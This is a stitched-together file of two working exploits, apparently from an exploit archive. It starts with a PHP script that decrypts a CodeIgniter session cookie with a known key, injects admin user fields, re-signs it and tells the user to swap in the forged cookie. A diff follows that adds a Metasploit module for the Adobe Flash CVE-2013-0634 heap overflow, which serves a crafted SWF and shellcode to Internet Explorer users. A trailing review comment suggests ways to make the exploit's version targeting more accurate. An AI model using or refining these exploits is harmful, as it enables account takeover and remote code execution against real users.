$enc .= $rand[($i % $lr)].($rand[($i % $lr)] ^ $string[$i]);
}
return $this->_xor_merge($enc, $key);
}
public function _xor_decode($string, $key = '')
{
if($key === '')
$key = $this->get_key();
$string = $this->_xor_merge($string, $key);
$dec = '';
for ($i = 0, $l = strlen($string); $i < $l; $i++)
{
$dec .= ($string[$i++] ^ $string[$i]);
}
return $dec;
}
protected function _xor_merge($string, $key)
{
$hash = $this->hash($key);
$str = '';
for ($i = 0, $ls = strlen($string), $lh = strlen($hash); $i < $ls; $i++)
{
$str .= $string[$i] ^ $hash[($i % $lh)];
}
return $str;
}
public function mcrypt_encode($data, $key = '')
{
if($key === '')
$key = $this->get_key();
$init_size = mcrypt_get_iv_size($this->_get_cipher(), $this->_get_mode());
$init_vect = mcrypt_create_iv($init_size, MCRYPT_RAND);
return $this->_add_cipher_noise($init_vect.mcrypt_encrypt($this->_get_cipher(), $key, $data, $this->_get_mode(), $init_vect), $key);
}
public function mcrypt_decode($data, $key = '')
{
if($key === '')
$key = $this->get_key();
$data = $this->_remove_cipher_noise($data, $key);
$init_size = mcrypt_get_iv_size($this->_get_cipher(), $this->_get_mode());
if ($init_size > strlen($data))
{
return FALSE;
}
$init_vect = substr($data, 0, $init_size);
$data = substr($data, $init_size);
return rtrim(mcrypt_decrypt($this->_get_cipher(), $key, $data, $this->_get_mode(), $init_vect), "\0");
}
protected function _add_cipher_noise($data, $key)
{
$key = $this->hash($key);
$str = '';
for ($i = 0, $j = 0, $ld = strlen($data), $lk = strlen($key); $i < $ld; ++$i, ++$j)
{
if ($j >= $lk)
{
$j = 0;
}
$str .= chr((ord($data[$i]) + ord($key[$j])) % 256);
}
return $str;
}
protected function _remove_cipher_noise($data, $key)
{
$key = $this->hash($key);
$str = '';
for ($i = 0, $j = 0, $ld = strlen($data), $lk = strlen($key); $i < $ld; ++$i, ++$j)
{
if ($j >= $lk)
{
$j = 0;
}
$temp = ord($data[$i]) - ord($key[$j]);
if ($temp < 0)
{
$temp += 256;
}
$str .= chr($temp);
}
return $str;
}
public function set_cipher($cipher)
{
$this->_mcrypt_cipher = $cipher;
return $this;
}
public function set_mode($mode)
{
$this->_mcrypt_mode = $mode;
return $this;
}
protected function _get_cipher()
{
if ($this->_mcrypt_cipher === NULL)
{
return $this->_mcrypt_cipher = MCRYPT_RIJNDAEL_256;
}
return $this->_mcrypt_cipher;
}
protected function _get_mode()
{
if ($this->_mcrypt_mode === NULL)
{
return $this->_mcrypt_mode = MCRYPT_MODE_CBC;
}
return $this->_mcrypt_mode;
}
public function set_hash($type = 'sha1')
{
$this->_hash_type = in_array($type, hash_algos()) ? $type : 'sha1';
}
public function hash($str)
{
return hash($this->_hash_type, $str);
}
}
$encryption = new CI_Encrypt();
$encryption->set_key(KEY);
// WRITE YOUR OWN COOKIE HERE!
$cookie = rawurldecode("DZyb3lI68zh+RBNg8C4M03TEJhMR4BBMzNWA1YUampWQ6UKaiUhG48rwkdfIs9DJYNQc8pZDniflInnUrQz1FbRxueQ3NLCahBBmrTuw8Ib7OL7ycm/IbuR81WEVrWpYOnQ4Z57/w21OCyVw42TjSkXkfWfN67veJr5630eTBA03vRbvLunZ9RLEuElqNrJu/H63yibCv8fyRWNnKs56i5OuU6Dso11O49k4fhxd008WTvsGliLxiErCkWwYfGfcjUA3V2Mh9mkrLk0YEKIbt3hbNXhAnGhIVIVJURhnmibqEFUacB1gP1GnbP2fQy3NpJt317n/3/sH+jH4lM+53IY1HOJh7n/J6RU9jqMr1hdeslDxFaV7SCuB4vPuO7SScec8063aae4808b195d818d86fda1d280ebb06bd");
$len = strlen($cookie) - 40;
if ($len < 0)
{
show_error('The session cookie was not signed.');
}
// Check cookie authentication
$hmac = substr($cookie, $len);
$session = substr($cookie, 0, $len);
if ($hmac !== hash_hmac('sha1', $session, KEY))
{
show_error('The session cookie data did not match what was expected.');
}
// Detect target encryption method and Decrypt session
$_mcrypt = $encryption->mcrypt_decode(base64_decode($session));
$_xor = $encryption->_xor_decode(base64_decode($session));
$method = '';
$plain = '';
if (strpos($_mcrypt, KEYWORD) !== false) {
_print("Encryption method is mcrypt!");
$method = 'm';
$plain = $_mcrypt;
} else if (strpos($_xor, KEYWORD) !== false) {
_print("Encryption method is xor!");
$method = 'x';
$plain = $_xor;
} else {
show_error("something went wrong.");
}
// Unserialize session string in order to create session array.
$session = unserialize($plain);
_print("Current Session Array :");
print_r($session).PHP_EOL;
// Add extra fields into it
$session['cms_user_name'] = 'admin';
$session['cms_user_id'] = 1;
// Print out payload string.
_print("Payload appended Session Array :");
print_r($session).PHP_EOL;
// Serialize it
$session = serialize($session);
// Encrypt it with same key.
if ($method === 'm')
$payload = base64_encode($encryption->mcrypt_encode($session));
if ($method === 'x')
$payload = base64_encode($encryption->_xor_encode($session));
// Calculation of hmac to add it end of the encrypted session string.
$payload .= hash_hmac('sha1', $payload, KEY);
_print("New Cookie");
_print($payload);
_print("Use Tamper Data and change cookie then push F5!");

121
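--- a/platforms/windows/remote/32959.rb
+++ b/platforms/windows/remote/32959.rb
@@ -0,0 +1,121 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'msf/core'
+class Metasploit3 < Msf::Exploit::Remote
+Rank = NormalRanking
+include Msf::Exploit::Remote::BrowserExploitServer
+def initialize(info={})
+super(update_info(info,
+'Name' => "Adobe Flash Player Regular Expression Heap Overflow",
+'Description' => %q{
+This module exploits a vulnerability found in the ActiveX component of Adobe
+Flash Player before 11.5.502.149. By supplying a specially crafted swf file
+with special regex value, it is possible to trigger an memory corruption, which
+results in remote code execution under the context of the user, as exploited in
+the wild in February 2013. This module has been tested successfully with Adobe
+Flash Player 11.5 before 11.5.502.149 on Windows XP SP3 and Windows 7 SP1 before
+MS13-063, since it takes advantage of a predictable SharedUserData in order to
+leak ntdll and bypass ASLR.
+},
+'License' => MSF_LICENSE,
+'Author' =>
+[
+'Unknown', # malware sample
+'Boris "dukeBarman" Ryutin', # msf exploit
+'juan vazquez' # ActionScript deobfuscation and cleaning
+],
+'References' =>
+[
+[ 'CVE', '2013-0634' ],
+[ 'OSVDB', '89936'],
+[ 'BID', '57787'],
+[ 'URL', 'http://malwaremustdie.blogspot.ru/2013/02/cve-2013-0634-this-ladyboyle-is-not.html' ],
+[ 'URL', 'http://malware.dontneedcoffee.com/2013/03/cve-2013-0634-adobe-flash-player.html' ],
+[ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html' ],
+[ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/adobe-patches-two-vulnerabilities-being-exploited-in-the-wild/' ],
+[ 'URL', 'http://eromang.zataz.com/tag/cve-2013-0634/' ]
+],
+'Payload' =>
+{
+'Space' => 1024,
+'DisableNops' => true
+},
+'DefaultOptions' =>
+{
+'InitialAutoRunScript' => 'migrate -f',
+'Retries' => false
+},
+'Platform' => 'win',
+'BrowserRequirements' =>
+{
+:source => /script|headers/i,
+:clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}",
+:method => "LoadMovie",
+:os_name => Msf::OperatingSystems::WINDOWS,
+:ua_name => Msf::HttpClients::IE,
+:flash => lambda { |ver| ver =~ /^11\.5/ && ver < '11.5.502.149' }
+},
+'Targets' =>
+[
+[ 'Automatic', {} ]
+],
+'Privileged' => false,
+'DisclosureDate' => "Feb 8 2013",
+'DefaultTarget' => 0))
+end
+def exploit
+@swf = create_swf
+super
+end
+def on_request_exploit(cli, request, target_info)
+print_status("Request: #{request.uri}")
+if request.uri =~ /\.swf$/
+print_status("Sending SWF...")
+send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})
+return
+end
+print_status("Sending HTML...")
+tag = retrieve_tag(cli, request)
+profile = get_profile(tag)
+profile[:tried] = false unless profile.nil? # to allow request the swf
+send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
+end
+def exploit_template(cli, target_info)
+swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
+shellcode = get_payload(cli, target_info).unpack("H*")[0]
+html_template = %Q|<html>
+<body>
+<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
+<param name="movie" value="<%=swf_random%>" />
+<param name="allowScriptAccess" value="always" />
+<param name="FlashVars" value="his=<%=shellcode%>" />
+<param name="Play" value="true" />
+</object>
+</body>
+</html>
+|
+return html_template, binding()
+end
+def create_swf
+path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2013-0634", "exploit.swf" )
+swf = ::File.open(path, 'rb') { |f| swf = f.read }
+swf
+end
+end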
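Review bot: The `:flash` requirement compares the client's version as a plain string, `ver < '11.5.502.149'`, so the check is lexicographic rather than numeric and a build whose last component has fewer digits (e.g. a hypothetical `11.5.502.99`) would wrongly be treated as patched; the known 11.5 builds happen to sort correctly, but the intent is a version comparison and should be written as one, e.g. `:flash => lambda { |ver| ver =~ /^11\.5/ && Gem::Version.new(ver) < Gem::Version.new('11.5.502.149') }`. While there, `request.uri =~ /\.swf$/` in `on_request_exploit` anchors with `$`, which in Ruby matches before a newline rather than end of string; `\z` is the safer anchor for a URI check. The header comment also has a broken URL, `http//metasploit.com/download`, missing its colon.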